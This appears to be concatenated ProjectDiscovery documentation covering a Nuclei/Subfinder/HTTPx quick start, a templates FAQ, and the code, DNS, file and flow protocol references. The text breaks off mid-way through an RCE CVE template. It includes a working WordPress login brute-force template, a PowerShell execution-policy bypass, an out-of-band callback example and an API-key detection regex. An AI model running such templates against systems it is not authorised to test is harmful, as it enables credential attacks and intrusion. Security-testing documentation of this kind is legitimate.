**1. Install the CLI Tools:** ProjectDiscovery's open-source tools are written in Go, so you'll need to have Go (v1.20+ recommended) installed on your system. There are two convenient ways to install the tools:
* *Use the Tool Manager (PDTM):* The **ProjectDiscovery Tool Manager (PDTM)** is a utility to install and update all tools easily. If you have Go, you can install PDTM by running:
```bash
go install -v github.com/projectdiscovery/pdtm/cmd/pdtm@latest
```
After installation, run `pdtm -ia` (install all) to automatically download and set up all ProjectDiscovery CLI tools. This one command gives you access to **Nuclei**, **Subfinder**, **HTTPx**, and many more tools in one go.
* *Install Individually:* Alternatively, you can install tools individually. For example:
```bash
go install -v github.com/projectdiscovery/subfinder/cmd/subfinder@latest
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest
go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
```
This will fetch the latest Subfinder, HTTPx, and Nuclei binaries into your `$GOPATH/bin`. (You can also find pre-built binaries on the ProjectDiscovery GitHub or use package managers like Homebrew on macOS.)
*Note:* Ensure your Go `bin` path is in your `PATH` environment variable so you can run the tools from any directory. Once installed, you can verify by running `subfinder -h`, `httpx -h`, and `nuclei -h` to see the help output.
**2. Asset Discovery with Subfinder:** To immediately see value from the CLI, start by discovering assets. For example, to find subdomains of a target domain:
```bash
subfinder -d example.com -o subdomains.txt
```
This command uses passive sources to enumerate subdomains of **example.com** and saves the results to `subdomains.txt`. In seconds, you'll get a list of domains that are part of the target's attack surface. (You can also run `subfinder -d example.com` without the `-o` flag to just print results to the screen.)
**3. Probing Assets with HTTPx:** Often, you'll want to know which of those discovered domains are alive and what web technologies they are running. **HTTPx** can take a list of hostnames and probe them for active web services:
```bash
httpx -l subdomains.txt -o live_hosts.txt -title -status-code -silent
```
Here, the `-title` and `-status-code` flags tell HTTPx to fetch the page title and HTTP status code for each host, and `-silent` removes verbose headers for clean output. The results saved in `live_hosts.txt` will show you which subdomains are up, and give a hint of what each is (for example, a status 200 and a title "Login Portal" might indicate a login page). This helps you focus on active targets.
**4. Vulnerability Scanning with Nuclei:** Now for the real value – finding vulnerabilities. **Nuclei** is a fast vulnerability scanner that uses template files to check targets for hundreds of known issues. You can run Nuclei against a single URL or a list:
```bash
nuclei -l live_hosts.txt -o findings.txt
```
This will scan all the hosts in `live_hosts.txt` for a broad range of vulnerabilities. Nuclei will output any findings to the console and also save them to `findings.txt`. Each finding will include the URL, the name of the vulnerability detected (based on the template that matched), and a severity level. For a quick test, you could also run nuclei directly on a single URL, e.g., `nuclei -u https://example.com`, to see if any common issues are present.
After running these tools, you should have: a list of your assets (subdomains), a list of active systems, and any potential vulnerabilities discovered. Even as a beginner, within a few minutes you've used the CLI to map out a target and identify possible security issues – demonstrating the immediate value of ProjectDiscovery's tools.
*(Tip: All ProjectDiscovery tools come with various options. For instance, you can update Nuclei templates with `nuclei -update-templates`, or limit scan scope by severity. As you grow more comfortable, you can customize these tools for more targeted results.)*
## Key Workflows & Use Cases
Automatically discover and track assets across your infrastructure
Continuously scan for and detect security vulnerabilities
Monitor and manage security exposures in real-time
Secure cloud and on-premise infrastructure
### Asset Discovery
The first step in securing your attack surface is knowing what assets you have. ProjectDiscovery simplifies **asset discovery** by automatically finding and inventorying assets across your domains and cloud environments. In the Cloud platform, you can start with a few **root domains**, and the system will continuously discover all subdomains, related hosts, and even cloud infrastructure tied to those domains. This gives you an up-to-date inventory of external-facing assets (websites, APIs, servers, etc.) without manual effort. On the CLI side, tools like Subfinder (for subdomains) and Cloudlist (for cloud resources) let you script out asset discovery as well. By quickly building a comprehensive asset list, you ensure that no part of your external infrastructure is overlooked.
### Real-time Vulnerability Scanning
Once you have an asset inventory, the next workflow is to find **exploitable vulnerabilities** on those assets – ideally before attackers do. ProjectDiscovery's approach focuses on *real-time, template-driven scanning*. The Cloud platform continuously runs vulnerability scans using the latest **Nuclei templates** contributed by the community and ProjectDiscovery researchers, so it can catch newly disclosed issues fast. You can perform on-demand scans (for example, after a new deployment) or schedule regular scans across all assets. In practice, this means if a critical vulnerability (say, a new RCE in a popular software) is added to the templates, ProjectDiscovery can detect it on your systems within minutes of its disclosure. Using the CLI, you can integrate Nuclei into your CI/CD or scripts to scan specific targets (for instance, scanning every new build of an application before release). The result is a proactive vulnerability management process – you're finding and fixing weaknesses *in real time*, rather than reacting after an incident.
### Exposure Management
Security isn't a one-time effort. **Exposure management** is about continuously monitoring for changes or new risks in your environment, both external and internal, and responding quickly. ProjectDiscovery Cloud excels here by offering continuous monitoring of your attack surface. Once you've added your assets, it will keep checking for things like new subdomains popping up, services changing, or new vulnerabilities arising. If an exposure is found – for example, an open database becomes visible or an internal server starts exposing a port – the platform can send you immediate alerts. You can configure real-time notifications via your preferred channels (Email, Slack, Microsoft Teams, or custom webhooks) for various events. This real-time awareness is crucial for catching misconfigurations or shadow IT (unknown assets) before they become major incidents. Additionally, ProjectDiscovery supports internal exposure monitoring: you can run internal network scans (using Nuclei or Naabu for ports) and feed the results into the platform to ensure even behind-the-firewall assets are tracked. In short, exposure management with ProjectDiscovery means you always have an eye on your security posture and can react to new threats or changes as they happen.
### Infrastructure Security
Modern organizations run on complex infrastructure – multiple cloud providers, containers, on-prem networks, etc. ProjectDiscovery helps with **infrastructure security** by scanning your cloud and network environments for misconfigurations and risks. Through its integrations (and tools like Cloudlist), ProjectDiscovery Cloud can enumerate assets from **AWS, GCP, Azure, and others**, identifying things like misconfigured S3 buckets, public-facing VMs, or open network ports. For example, you can connect your AWS account and automatically retrieve a list of IPs, hostnames, and services you have, then have Nuclei scan them for known cloud-specific vulnerabilities. The platform's built-in port scanner (powered by Naabu) can check all your asset IPs for open ports (1-65535) to uncover services you might not realize are exposed. On the CLI side, you can similarly use Naabu for port scanning and feed those results into Nuclei or other tools for deeper analysis. Importantly, ProjectDiscovery also supports scanning internal infrastructure by letting you run scans within your network and upload the results to the cloud platform. This means even if certain systems aren't reachable from the outside, you can still include them in your security assessment. **Infrastructure security** use cases include checking your cloud accounts for open admin ports, ensuring no dev database is inadvertently open to the internet, and verifying that all your critical services are configured securely. ProjectDiscovery provides the tools to automate these checks across your entire tech stack.
## Automation & Integration
Integrate ProjectDiscovery into your workflows using our REST APIs
Connect with ticketing, alerting, and cloud services
## Additional Resources
Join our active community for support and discussions
Explore our open-source tools and contribute
Read about security research and tool updates
## Next Steps & Resources
You've just scratched the surface of what ProjectDiscovery can do. Here are some next steps and resources to continue your journey:
* **Official Documentation:**
* Explore the comprehensive docs at **[docs.projectdiscovery.io](https://docs.projectdiscovery.io)**
* [Cloud Platform Overview](/cloud/introduction)
* [Asset Discovery Guide](/cloud/assets/overview)
* [Vulnerability Scanning Guide](/cloud/scanning/overview)
* [API Documentation](/api-reference/introduction)
* **Community Support:**
* Join the [ProjectDiscovery Discord](https://discord.gg/projectdiscovery) for real-time discussions
* Visit our [GitHub Discussions](https://github.com/projectdiscovery/nuclei/discussions) for technical questions
* Follow us on [Twitter](https://twitter.com/pdiscoveryio) for updates
* Report issues on [GitHub](https://github.com/projectdiscovery)
* **Tutorials & Examples:**
* Watch our ["All ProjectDiscovery Tools in 30 Minutes"](https://www.youtube.com/watch?v=cBkfk0VbvLw) video
* Learn about [Template Creation](/templates/introduction)
* Explore [Cloud Integrations](/cloud/integrations)
* Read our [Technical Blog](https://blog.projectdiscovery.io)
* Check [Template Examples](/templates/structure)
* **Nuclei Templates & Open Source:**
* Browse the [Nuclei Templates Repository](https://github.com/projectdiscovery/nuclei-templates)
* Learn about [Contributing Templates](/templates/introduction#contributing)
* Use the [Template Editor](https://cloud.projectdiscovery.io/templates/editor)
* Explore [Template Syntax](/templates/protocols/http/basic-http)
* **Integration Guides:**
* Set up [Cloud Provider Integrations](/cloud/integrations#cloud-asset-discovery)
* Configure [Notification Systems](/cloud/integrations#notification-integrations)
* Implement [Ticketing Integration](/cloud/integrations#ticketing-integrations)
* Use [Custom Webhooks](/cloud/integrations#webhook)
* Learn about [API Integration](/api-reference/introduction)
By following this quick start guide, you've taken the first steps in proactive security monitoring. With ProjectDiscovery's cloud platform and CLI tools at your disposal, you have a scalable way to discover what you have, know when it's vulnerable, and respond faster. Keep experimenting with the tools, leverage the community's knowledge, and soon you'll be using ProjectDiscovery to its full potential in defending your organization's attack surface. Happy scanning!
# Nuclei Templates FAQ
Source: https://docs.projectdiscovery.io/templates/faq
Common questions and answers about Nuclei templates, including usage tips and best practices.
For info on the Nuclei Template Editor or using templates on our cloud platform - [learn more here](/cloud/editor/overview).
Nuclei [templates](http://github.com/projectdiscovery/nuclei-templates) are the core of the Nuclei project. The templates contain the actual logic that is executed in order to detect various vulnerabilities. The project consists of **several thousand** ready-to-use **[community-contributed](https://github.com/projectdiscovery/nuclei-templates/graphs/contributors)** vulnerability templates.
We maintain a [template guide](/templates/introduction/) for writing new and custom Nuclei templates.
Performing security assessment of an application is time-consuming. It's always better and time-saving to automate steps whenever possible. Once you've found a security vulnerability, you can prepare a Nuclei template by defining the required HTTP request to reproduce the issue, and test the same vulnerability across multiple hosts with ease. It's worth mentioning ==you write the template once and use it forever==, as you don't need to manually test that specific vulnerability any longer.
Here are few examples from the community making use of templates to automate the security findings:
* [https://dhiyaneshgeek.github.io/web/security/2021/02/19/exploiting-out-of-band-xxe/](https://dhiyaneshgeek.github.io/web/security/2021/02/19/exploiting-out-of-band-xxe/)
* [https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning](https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning)
* [https://blog.melbadry9.xyz/dangling-dns/xyz-services/ddns-worksites](https://blog.melbadry9.xyz/dangling-dns/xyz-services/ddns-worksites)
* [https://blog.melbadry9.xyz/dangling-dns/aws/ddns-ec2-current-state](https://blog.melbadry9.xyz/dangling-dns/aws/ddns-ec2-current-state)
* [https://projectdiscovery.io/blog/if-youre-not-writing-custom-nuclei-templates-youre-missing-out](https://projectdiscovery.io/blog/if-youre-not-writing-custom-nuclei-templates-youre-missing-out)
Nuclei templates can be executed using a template name or with tags, using `-templates` (`-t`) and `-tags` flag, respectively.
```
nuclei -tags cve -list target_urls.txt
```
You are always welcome to share your templates with the community. You can either open a [GitHub issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=\&labels=nuclei-template\&template=submit-template.md\&title=%5Bnuclei-template%5D+template-name) with the template details or open a GitHub [pull request](https://github.com/projectdiscovery/nuclei-templates/pulls) with your nuclei templates. If you don't have a GitHub account, you can also make use of the [discord server](https://discord.gg/projectdiscovery) to share the template with us.
The Nuclei template project is a **community-contributed project**. The ProjectDiscovery team manually reviews templates before merging them into the project. Still, there is a possibility that some templates with weak matchers will slip through the verification. This could produce false-positive results. **Templates are only as good as their matchers.**
If you identified templates producing false positive/negative results, here are few steps that you can follow to fix them quickly.
Direct message us on [Twitter](https://twitter.com/pdnuclei) or [Discord](https://discord.gg/projectdiscovery) to confirm the validity of the template.
Please open a GitHub [issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=\&labels=false-positive\&template=false-positive.md\&title=%5Bfalse-positive%5D+template-name+) with details, and we will work to address the problem and update the template.
Please open a GitHub [pull request](https://github.com/projectdiscovery/nuclei-templates/pulls) with fix.
The Nuclei templates project houses a variety of templates which perform fuzzing and other actions which may result in a DoS against the target system (see [the list here](https://github.com/projectdiscovery/nuclei-templates/blob/master/.nuclei-ignore)). To ensure these templates are not accidentally run, they are tagged and excluded them from the default scan. These templates can be only executed when explicitly invoked using the `-itags` option.
{" "}
When you download or update Nuclei templates using the Nuclei binary, it
downloads all the templates from the latest **release**. All templates added
after the release exist in the [master
branch](https://github.com/projectdiscovery/nuclei-templates) and are added to
Nuclei when a new template release is created.
# Introduction to Nuclei Templates
Source: https://docs.projectdiscovery.io/templates/introduction
YAML based universal language for describing exploitable vulnerabilities
Write and test Nuclei templates directly in your browser using our [template editor](https://cloud.projectdiscovery.io/templates/editor). The editor supports AI-assisted template generation, real-time validation, and immediate scanning against your targets. Need automation? Check out our [template generation API](/api-reference/templates/generate-ai-template).
## What are Nuclei Templates?
Nuclei templates are the cornerstone of the Nuclei scanning engine. Nuclei templates enable precise and rapid scanning across various protocols like TCP, DNS, HTTP, and more. They are designed to send targeted requests based on specific vulnerability checks, ensuring low-to-zero false positives and efficient scanning over large networks.
## YAML
Nuclei templates are based on the concepts of `YAML` based template files that define how the requests will be sent and processed. This allows easy extensibility capabilities to nuclei. The templates are written in `YAML` which specifies a simple human-readable format to quickly define the execution process.
## Universal Language for Vulnerabilities
Nuclei Templates offer a streamlined way to identify and communicate vulnerabilities, combining essential details like severity ratings and detection methods. This open-source, community-developed tool accelerates threat response and is widely recognized in the cybersecurity world.
Learn more about nuclei templates as a universal language for exploitable vulnerabilities [on our blog](https://projectdiscovery.io/blog/the-power-of-nuclei-templates-a-universal-language-of-vulnerabilities/).
## Learn more
Let's dive into the world of Nuclei templates! Use the links on the left or those below to learn more.
Learn what makes up the structure of a nuclei template
Get started making simple HTTP requests with Nuclei
Watch a video on writing your first nuclei template!
Nuclei thrives on community contributions. Submit your templates to be used by security experts everywhere!
# Code Protocol
Source: https://docs.projectdiscovery.io/templates/protocols/code
Learn about using external code with Nuclei
Nuclei enables the execution of external code on the host operating system. This feature allows security researchers, pentesters, and developers to extend the capabilities of Nuclei and perform complex actions beyond the scope of regular supported protocol-based testing.
By leveraging this capability, Nuclei can interact with the underlying operating system and execute custom scripts or commands, opening up a wide range of possibilities. It enables users to perform tasks such as system-level configurations, file operations, network interactions, and more. This level of control and flexibility empowers users to tailor their security testing workflows according to their specific requirements.
To write code template, a code block is used to indicate the start of the requests for the template. This block marks the beginning of the code-related instructions.
```yaml
# Start the requests for the template right here
code:
```
## Engine
To execute the code, a list of language interpreters, which are installed or available on the system environment, is specified. These interpreters can be and not limited to `bash` `sh` `py` `python3`, `go`, `ps`, among others, and they are searched sequentially until a suitable one is found. The identifiers for these interpreters should correspond to their respective names or identifiers recognized by the system environment.
```yaml
- engine:
- py
- python3
```
The code to be executed can be provided either as an external file or as a code snippet directly within the template.
For an external file:
```yaml
source: helpers/code/pyfile.py
```
For a code snippet:
```yaml
source: |
import sys
print("hello from " + sys.stdin.read())
```
The target is passed to the template via stdin, and the output of the executed code is available for further processing in matchers and extractors. In the case of the Code protocol, the response part represents all data printed to stdout during the execution of the code.
## Parts
Valid `part` values supported by **Code** protocol for Matchers / Extractor are -
| Value | Description |
| -------- | ---------------------------------------------------- |
| response | execution output (trailing whitespaces are filtered) |
| stderr | Raw Stderr Output(if any) |
The provided example demonstrates the execution of a bash and python code snippet within the template. The specified engines are searched in the given order, and the code snippet is executed accordingly. Additionally, dynamic template variables are used in the code snippet, which are replaced with their respective values during the execution of the template which shows the flexibility and customization that can be achieved using this protocol.
```yaml
id: code-template
info:
name: example code template
author: pdteam
severity: info
variables:
OAST: "{{interactsh-url}}"
code:
- engine:
- sh
- bash
source: |
echo "$OAST" | base64
- engine:
- py
- python3
source: |
import base64
import os
text = os.getenv('OAST')
text_bytes = text.encode('utf-8')
base64_bytes = base64.b64encode(text_bytes)
base64_text = base64_bytes.decode('utf-8')
print(base64_text)
http:
- method: GET
path:
- "{{BaseURL}}/?x={{code_1_response}}"
- "{{BaseURL}}/?x={{code_2_response}}"
# digest: 4a0a0047304502202ce8fe9f5992782da6ba59da4e8ebfde9f19a12e247adc507040e9f1f1124b4e022100cf0bc7a44a557a6655f79a2b4789e103f5099f0f81a8d1bc4ad8aabe7829b1c5:8eeeebe39b11b16384b45bc7e9163000
```
Apart from required fields mentioned above, Code protocol also supports following optional fields to further customize the execution of code.
## Args
Args are arguments that are sent to engine while executing the code. For example if we want to bypass execution policy in powershell for specific template this can be done by adding following args to the template.
```yaml
- engine:
- powershell
- powershell.exe
args:
- -ExecutionPolicy
- Bypass
- -File
```
## Pattern
Pattern field can be used to customize name / extension of temporary file while executing a code snippet in a template
```yaml
pattern: "*.ps1"
```
adding `pattern: "*.ps1"` will make sure that name of temporary file given pattern.
## Examples
This code example shows a basic response based on DSL.
```yaml
id: code-template
info:
name: example code template
author: pdteam
severity: info
self-contained: true
code:
- engine:
- py
- python3
source: |
print("Hello World")
extractors:
- type: dsl
dsl:
- response
# digest: 4a0a0047304502204576db451ff35ea9a13c107b07a6d74f99fd9a78f5c2316cc3dece411e7d5a2b022100a36db96f2a56492147ca3e7de3c4d36b8e1361076a70924061790003958c4ef3:c40a3a04977cdbf9dca31c1002ea8279
```
Below is a example code template where we are executing a powershell script while customizing behaviour of execution policy and setting pattern to `*.ps1`
```yaml
id: ps1-code-snippet
info:
name: ps1-code-snippet
author: pdteam
severity: info
description: |
ps1-code-snippet
tags: code
code:
- engine:
- powershell
- powershell.exe
args:
- -ExecutionPolicy
- Bypass
- -File
pattern: "*.ps1"
source: |
$stdin = [Console]::In
$line = $stdin.ReadLine()
Write-Host "hello from $line"
matchers:
- type: word
words:
- "hello from input"
# digest: 4a0a00473045022100eb01da6b97893e7868c584f330a0cd52df9bddac005860bb8595ba5b8aed58c9022050043feac68d69045cf320cba9298a2eb2e792ea4720d045d01e803de1943e7d:4a3eb6b4988d95847d4203be25ed1d46
```
## Running Code Templates
By default Nuclei will not execute code templates. To enable code protocol execution, `-code` flag needs to be explicitly passed to nuclei.
```bash
nuclei -t code-template.yaml -code
```
## Learn More
For more examples, please refer to example [code-templates](https://github.com/projectdiscovery/nuclei/tree/main/integration_tests/protocols/code) in integration tests.
It's important to exercise caution while utilizing this feature, as executing external code on the host operating system carries inherent risks. It is crucial to ensure that the executed code is secure, thoroughly tested, and does not pose any unintended consequences or security risks to the target system.
To ensure the integrity of the code in your templates, be sure to sign your templates using the [Template Signing](/templates/reference/template-signing) methods.
# DNS Protocol
Source: https://docs.projectdiscovery.io/templates/protocols/dns
Learn about using DNS with Nuclei
DNS protocol can be modelled in Nuclei with ease. Fully Customizable DNS requests can be sent by Nuclei to nameservers and matching/extracting can be performed on their response.
DNS Requests start with a **dns** block which specifies the start of the requests for the template.
```yaml
# Start the requests for the template right here
dns:
```
### Type
First thing in the request is **type**. Request type can be **A**, **NS**, **CNAME**, **SOA**, **PTR**, **MX**, **TXT**, **AAAA**.
```yaml
# type is the type for the dns request
type: A
```
### Name
The next part of the requests is the DNS **name** to resolve. Dynamic variables can be placed in the path to modify its value on runtime. Variables start with `{{` and end with `}}` and are case-sensitive.
1. **FQDN** - variable is replaced by the hostname/FQDN of the target on runtime.
An example name value:
```yaml
name: {{FQDN}}.com
# This value will be replaced on execution with the FQDN.
# If FQDN is https://this.is.an.example then the
# name will get replaced to the following: this.is.an.example.com
```
As of now the tool supports only one name per request.
### Class
Class type can be **INET**, **CSNET**, **CHAOS**, **HESIOD**, **NONE** and **ANY**. Usually it's enough to just leave it as **INET**.
```yaml
# method is the class for the dns request
class: inet
```
### Recursion
Recursion is a boolean value, and determines if the resolver should only return cached results, or traverse the whole dns root tree to retrieve fresh results. Generally it's better to leave it as **true**.
```yaml
# Recursion is a boolean determining if the request is recursive
recursion: true
```
### Retries
Retries is the number of attempts a dns query is retried before giving up among different resolvers. It's recommended a reasonable value, like **3**.
```yaml
# Retries is a number of retries before giving up on dns resolution
retries: 3
```
### Matchers / Extractor Parts
Valid `part` values supported by **DNS** protocol for Matchers / Extractor are -
| Value | Description |
| ---------------- | --------------------------- |
| request | DNS Request |
| rcode | DNS Rcode |
| question | DNS Question Message |
| extra | DNS Message Extra Field |
| answer | DNS Message Answer Field |
| ns | DNS Message Authority Field |
| raw / all / body | Raw DNS Message |
### **Example DNS Template**
The final example template file for performing `A` query, and check if CNAME and A records are in the response is as follows:
```yaml
id: dummy-cname-a
info:
name: Dummy A dns request
author: mzack9999
severity: info
description: Checks if CNAME and A record is returned.
dns:
- name: "{{FQDN}}"
type: A
class: inet
recursion: true
retries: 3
matchers:
- type: word
words:
# The response must contain a CNAME record
- "IN\tCNAME"
# and also at least 1 A record
- "IN\tA"
condition: and
```
More complete examples are provided [here](/templates/protocols/dns-examples)
# File Protocol
Source: https://docs.projectdiscovery.io/templates/protocols/file
Learn about using Nuclei to work with the local file system
## Overview
Nuclei allows modelling templates that can match/extract on the local file system.
```yaml
# Start of file template block
file:
```
## Extensions
To match on all extensions (except the ones in default denylist), use the following -
```yaml
extensions:
- all
```
You can also provide a list of custom extensions that should be matched upon.
```yaml
extensions:
- py
- go
```
A denylist of extensions can also be provided. Files with these extensions will not be processed by nuclei.
```yaml
extensions:
- all
denylist:
- go
- py
- txt
```
By default, certain extensions are excluded in nuclei file module. A list of these is provided below-
```
3g2,3gp,7z,apk,arj,avi,axd,bmp,css,csv,deb,dll,doc,drv,eot,exe,
flv,gif,gifv,gz,h264,ico,iso,jar,jpeg,jpg,lock,m4a,m4v,map,mkv,
mov,mp3,mp4,mpeg,mpg,msi,ogg,ogm,ogv,otf,pdf,pkg,png,ppt,psd,rar,
rm,rpm,svg,swf,sys,tar,tar.gz,tif,tiff,ttf,txt,vob,wav,webm,wmv,
woff,woff2,xcf,xls,xlsx,zip
```
## More Options
**max-size** parameter can be provided which limits the maximum size (in bytes) of files read by nuclei engine.
As default the `max-size` value is 5 MB (5242880), Files larger than the `max-size` will not be processed.
***
**no-recursive** option disables recursive walking of directories / globs while input is being processed for file module of nuclei.
## Matchers / Extractors
**File** protocol supports 2 types of Matchers -
| Matcher Type | Part Matched |
| ------------ | ------------ |
| word | all |
| regex | all |
| Extractors Type | Part Matched |
| --------------- | ------------ |
| word | all |
| regex | all |
## **Example File Template**
The final example template file for a Private Key detection is provided below.
```yaml
id: google-api-key
info:
name: Google API Key
author: pdteam
severity: info
file:
- extensions:
- all
- txt
extractors:
- type: regex
name: google-api-key
regex:
- "AIza[0-9A-Za-z\\-_]{35}"
```
```bash
# Running file template on http-response/ directory
nuclei -t file.yaml -file -target http-response/
# Running file template on output.txt
nuclei -t file.yaml -file -target output.txt
```
More complete examples are provided [here](/templates/protocols/file-examples)
# Flow Protocol
Source: https://docs.projectdiscovery.io/templates/protocols/flow
Learn about the template flow engine in Nuclei v3
## Overview
The template flow engine was introduced in nuclei v3, and brings two significant enhancements to Nuclei:
* The ability to [conditionally execute requests](#conditional-execution)
* The [orchestration of request execution](#request-execution-orchestration)
These features are implemented using JavaScript (ECMAScript 5.1) via the [goja](https://github.com/dop251/goja) backend.
## Conditional Execution
Many times when writing complex templates we might need to add some extra checks (or conditional statements) before executing certain part of request.
An ideal example of this would be when [bruteforcing wordpress login](https://cloud.projectdiscovery.io/public/wordpress-weak-credentials) with default usernames and passwords, but if we carefully re-evaluate this template, we can see that template is sending 276 requests without even checking, if the url actually exists or the target site is actually a wordpress site.
With addition of flow in Nuclei v3 we can re-write this template to first check if the target is a wordpress site, if yes then bruteforce login with default credentials and this can be achieved by simply adding one line of content i.e `flow: http(1) && http(2)` and nuclei will take care of everything else.
```yaml
id: wordpress-bruteforce
info:
name: WordPress Login Bruteforce
author: pdteam
severity: high
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/wp-login.php"
matchers:
- type: word
words:
- "WordPress"
- method: POST
path:
- "{{BaseURL}}/wp-login.php"
body: |
log={{username}}&pwd={{password}}&wp-submit=Log+In
attack: clusterbomb
payloads:
users: helpers/wordlists/wp-users.txt
passwords: helpers/wordlists/wp-passwords.txt
matchers:
- type: dsl
dsl:
- status_code == 302
- contains_all(header, "/wp-admin","wordpress_logged_in")
condition: and
```
The update template now seems straight forward and easy to understand. we are first checking if the target is a wordpress site and then executing bruteforce requests. This is just a simple example of conditional execution and flow accepts any Javascript (ECMAScript 5.1) expression/code so you are free to craft any conditional execution logic you want.
## Request Execution Orchestration
Flow is a powerful Nuclei feature that provides enhanced orchestration capabilities for executing requests. The simplicity of conditional execution is just the beginning. With flow, you can:
* Iterate over a list of values and execute a request for each one
* Extract values from a request, iterate over them, and perform another request for each
* Get and set values within the template context (global variables)
* Write output to stdout for debugging purposes or based on specific conditions
* Introduce custom logic during template execution
* Use ECMAScript 5.1 JavaScript features to build and modify variables at runtime
* Update variables at runtime and use them in subsequent requests.
Think of request execution orchestration as a bridge between JavaScript and Nuclei, offering two-way interaction within a specific template.
**Practical Example: Vhost Enumeration**
To better illustrate the power of flow, let's consider developing a template for vhost (virtual host) enumeration. This set of tasks typically requires writing a new tool from scratch. Here are the steps we need to follow:
1. Retrieve the SSL certificate for the provided IP (using tlsx)
* Extract `subject_cn` (CN) from the certificate
* Extract `subject_an` (SAN) from the certificate
* Remove wildcard prefixes from the values obtained in the steps above
2. Bruteforce the request using all the domains found from the SSL request
You can utilize flow to simplify this task. The JavaScript code below orchestrates the vhost enumeration:
```javascript
ssl();
for (let vhost of iterate(template["ssl_domains"])) {
set("vhost", vhost);
http();
}
```
In this code, we've introduced 5 extra lines of JavaScript. This allows the template to perform vhost enumeration. The best part? You can run this at scale with all features of Nuclei, using supported inputs like ASN, CIDR, URL.
Let's break down the JavaScript code:
1. `ssl()`: This function executes the SSL request.
2. `template["ssl_domains"]`: Retrieves the value of `ssl_domains` from the template context.
3. `iterate()`: Helper function that iterates over any value type while handling empty or null values.
4. `set("vhost", vhost)`: Creates a new variable `vhost` in the template and assigns the `vhost` variable's value to it.
5. `http()`: This function conducts the HTTP request.
By understanding and taking advantage of Nuclei's `flow`, you can redefine the way you orchestrate request executions, making your templates much more powerful and efficient.
Here is working template for vhost enumeration using flow:
```yaml
id: vhost-enum-flow
info:
name: vhost enum flow
author: tarunKoyalwar
severity: info
description: |
vhost enumeration by extracting potential vhost names from ssl certificate.
flow: |
ssl();
for (let vhost of iterate(template["ssl_domains"])) {
set("vhost", vhost);
http();
}
ssl:
- address: "{{Host}}:{{Port}}"
http:
- raw:
- |
GET / HTTP/1.1
Host: {{vhost}}
matchers:
- type: dsl
dsl:
- status_code != 400
- status_code != 502
extractors:
- type: dsl
dsl:
- '"VHOST: " + vhost + ", SC: " + status_code + ", CL: " + content_length'
```
## JS Bindings
This section contains a brief description of all nuclei JS bindings and their usage.
### Protocol Execution Function
In nuclei, any listed protocol can be invoked or executed in JavaScript using the `protocol_name()` format. For example, you can use `http()`, `dns()`, `ssl()`, etc.
If you want to execute a specific request of a protocol (refer to nuclei-flow-dns for an example), it can be achieved by passing either:
* The index of that request in the protocol (e.g.,`dns(1)`, `dns(2)`)
* The ID of that request in the protocol (e.g., `dns("extract-vps")`, `http("probe-http")`)
For more advanced scenarios where multiple requests of a single protocol need to be executed, you can specify their index or ID one after the other (e.g., dns("extract-vps","1")).
This flexibility in using either index numbers or ID strings to call specific protocol requests provides controls for tailored execution, allowing you to build more complex and efficient workflows. more complex use cases multiple requests of a single protocol can be executed by just specifying their index or id one after another (ex: `dns("extract-vps","1")`)
### Iterate Helper Function
Iterate is a nuclei js helper function which can be used to iterate over any type of value like **array**, **map**, **string**, **number** while handling empty/nil values.
This is addon helper function from nuclei to omit boilerplate code of checking if value is empty or not and then iterating over it
```javascript
iterate(123,{"a":1,"b":2,"c":3})
// iterate over array with custom separator
iterate([1,2,3,4,5], " ")
```
### Set Helper Function
When iterating over a values/array or some other use case we might want to invoke a request with custom/given value and this can be achieved by using `set()` helper function. When invoked/called it adds given variable to template context (global variables) and that value is used during execution of request/protocol. the format of `set()` is `set("variable_name",value)` ex: `set("username","admin")`.
```javascript
for (let vhost of myArray) {
set("vhost", vhost);
http(1)
}
```
**Note:** In above example we used `set("vhost", vhost)` which added `vhost` to template context (global variables) and then called `http(1)` which used this value in request.
### Template Context
A template context is nothing but a map/jsonl containing all this data along with internal/unexported data that is only available at runtime (ex: extracted values from previous requests, variables added using `set()` etc). This template context is available in javascript as `template` variable and can be used to access any data from it. ex: `template["dns_cname"]`, `template["ssl_subject_cn"]` etc.
```javascript
template["ssl_domains"] // returns value of ssl_domains from template context which is available after executing ssl request
template["ptrValue"] // returns value of ptrValue which was extracted using regex with internal: true
```
Lot of times we don't known what all data is available in template context and this can be easily found by printing it to stdout using `log()` function
```javascript
log(template)
```
### Log Helper Function
It is a nuclei js alternative to `console.log` and this pretty prints map data in readable format
**Note:** This should be used for debugging purposed only as this prints data to stdout
### Dedupe
Lot of times just having arrays/slices is not enough and we might need to remove duplicate variables . for example in earlier vhost enumeration we did not remove any duplicates as there is always a chance of duplicate values in `ssl_subject_cn` and `ssl_subject_an` and this can be achieved by using `dedupe()` object. This is nuclei js helper function to abstract away boilerplate code of removing duplicates from array/slice
```javascript
let uniq = new Dedupe(); // create new dedupe object
uniq.Add(template["ptrValue"])
uniq.Add(template["ssl_subject_cn"]);
uniq.Add(template["ssl_subject_an"]);
log(uniq.Values())
```
And that's it, this automatically converts any slice/array to map and removes duplicates from it and returns a slice/array of unique values
> Similar to DSL helper functions . we can either use built in functions available with `Javscript (ECMAScript 5.1)` or use DSL helper functions and its upto user to decide which one to uses.
### Skip Internal Matchers in MultiProtocol / Flow Templates
Before nuclei v3.1.4 , A template like [`CVE-2023-43177`](https://github.com/projectdiscovery/nuclei-templates/blob/c5be73e328ebd9a0c122ea0324f60bbdd7eb940d/http/cves/2023/CVE-2023-43177.yaml#L28) which has multiple requests/protocols and uses `flow` for logic, used to only return one result but it conflicted with logic when `for` loop was used in `flow` to fix this nuclei engine from v3.1.4 will print all events/results in a template and template writers can use `internal: true` in matchers to skip printing of events/results just like dynamic extractors.
Note: this is only relevant if matchers/extractors are used in previous requests/protocols
Example of [`CVE-2023-6553`](https://github.com/projectdiscovery/nuclei-templates/blob/c5be73e328ebd9a0c122ea0324f60bbdd7eb940d/http/cves/2023/CVE-2023-6553.yaml#L21) with new `internal: true` logic would be
```yaml
id: CVE-2023-6553
info:
name: Worpress Backup Migration <= 1.3.7 - Unauthenticated Remote Code Execution
author: FLX
severity: critical
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/backup-backup/readme.txt"
matchers:
- type: dsl
dsl:
